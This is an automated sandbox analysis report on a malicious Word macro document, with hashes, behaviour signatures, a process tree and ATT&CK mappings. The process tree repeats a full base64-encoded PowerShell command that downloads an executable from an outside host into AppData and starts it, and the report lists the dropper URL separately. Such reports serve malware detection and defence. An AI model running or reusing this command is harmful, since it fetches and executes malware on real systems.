Analysis

  • max time kernel
    119s
  • max time network
    138s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    11-05-2021 04:01

General

  • Target

    3fce454b_by_Libranalysis.doc

  • Size

    43KB

  • MD5

    3fce454b5a5ba7d73cc2b2560f69a48a

  • SHA1

    b9321f7d1bbb1e020b03b676bd23d53e9ff6c17e

  • SHA256

    b9c87683d4000e24d419ebe199d2c55dbb9757d5cc8f4e6d9a0295e963cbb07c

  • SHA512

    fc35cb2957f15a3cdadf282c1b6d0f876dd710061d7c645618b83a394171723d24ddfecc64d721cb2cb1745e44a283dcc7278d6da9f3a67465e2cb8e760eb943

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://atlantastunttruckdrivers.com/Denight.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3fce454b_by_Libranalysis.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3876
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGwAYQBuAHQAYQBzAHQAdQBuAHQAdAByAHUAYwBrAGQAcgBpAHYAZQByAHMALgBjAG8AbQAvAEQAZQBuAGkAZwBoAHQALgBlAHgAZQAnACwAKAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQApACsAJwBcAEcAZABSAHIAWQBDAC4AZQB4AGUAJwApADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAXABHAGQAUgByAFkAQwAuAGUAeABlAA==
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1588
      • C:\Windows\system32\cmd.exe
        cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGwAYQBuAHQAYQBzAHQAdQBuAHQAdAByAHUAYwBrAGQAcgBpAHYAZQByAHMALgBjAG8AbQAvAEQAZQBuAGkAZwBoAHQALgBlAHgAZQAnACwAKAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQApACsAJwBcAEcAZABSAHIAWQBDAC4AZQB4AGUAJwApADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAXABHAGQAUgByAFkAQwAuAGUAeABlAA==
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2776
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGwAYQBuAHQAYQBzAHQAdQBuAHQAdAByAHUAYwBrAGQAcgBpAHYAZQByAHMALgBjAG8AbQAvAEQAZQBuAGkAZwBoAHQALgBlAHgAZQAnACwAKAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQApACsAJwBcAEcAZABSAHIAWQBDAC4AZQB4AGUAJwApADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAXABHAGQAUgByAFkAQwAuAGUAeABlAA==
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1968

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1588-179-0x0000000000000000-mapping.dmp
  • memory/1968-185-0x00000121F0138000-0x00000121F0139000-memory.dmp
    Filesize

    4KB

  • memory/1968-184-0x00000121F0136000-0x00000121F0138000-memory.dmp
    Filesize

    8KB

  • memory/1968-182-0x00000121F0130000-0x00000121F0132000-memory.dmp
    Filesize

    8KB

  • memory/1968-183-0x00000121F0133000-0x00000121F0135000-memory.dmp
    Filesize

    8KB

  • memory/1968-181-0x0000000000000000-mapping.dmp
  • memory/2776-180-0x0000000000000000-mapping.dmp
  • memory/3876-117-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
    Filesize

    64KB

  • memory/3876-123-0x00007FFDF5880000-0x00007FFDF7775000-memory.dmp
    Filesize

    31.0MB

  • memory/3876-122-0x00007FFDF8120000-0x00007FFDF920E000-memory.dmp
    Filesize

    16.9MB

  • memory/3876-118-0x00007FFDFCE60000-0x00007FFDFF983000-memory.dmp
    Filesize

    43.1MB

  • memory/3876-119-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
    Filesize

    64KB

  • memory/3876-114-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
    Filesize

    64KB

  • memory/3876-116-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
    Filesize

    64KB

  • memory/3876-115-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
    Filesize

    64KB